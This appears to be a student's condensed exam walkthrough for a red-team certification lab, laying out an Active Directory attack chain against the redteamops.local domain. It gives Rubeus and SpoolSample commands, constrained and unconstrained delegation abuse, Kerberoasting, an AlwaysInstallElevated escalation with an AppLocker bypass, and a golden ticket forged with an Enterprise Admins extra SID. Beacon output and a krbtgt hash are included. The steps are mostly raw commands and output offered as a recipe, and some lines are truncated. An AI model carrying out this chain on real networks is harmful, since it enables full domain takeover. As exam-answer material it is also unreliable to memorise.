Old Crto 2
Attack path:
using CS)
If using Covenant: https://luemmelsec.github.io/Circumventing-Countermeasures-In-AD/
Open your beacon to get a shell back. To get SYSTEM you need to follow the course material (AlwaysInstallElevated): rename the package to lapsx64.msi as per the AppLocker policy and place it in the task.
Run bloodhound
Kerberoast jjames and atorres and crack them.
Impersonate ofisher with constrained delegation.
/impersonateuser:Administrator /msdsspn:time/srv-2.child.redteamops.local /altservice:cifs,host /ptt
Do unconstrained delegation on srv-2 to reach dc-2.
.\Rubeus.exe monitor /interval:1 (run this on the computer with unconstrained delegation)
Then on another window: .\SpoolSample.exe targetMachine.dc.local currentMachine.local
Rubeus.exe ptt /ticket:<<paste the above ticket here>>
Jump to dc-2
2453654091-64307236-1669735849 /krbtgt:6ad171448618690dde2c67f72b85a5ea /sids:S-1-5-21-2453654091-64307236-1669735849-519 /user:administrator /ptt command
[+] host called home, sent: 706122 bytes
[+] received output:
User : administrator
Domain : child.redteamops.local (CHILD)
SID : S-1-5-21-2453654091-64307236-1669735849
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-2453654091-64307236-1669735849-519 ;
ServiceKey: 6ad171448618690dde2c67f72b85a5ea - rc4_hmac_nt
Lifetime :
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'administrator @ child.redteamops.local' successfully submitted for current session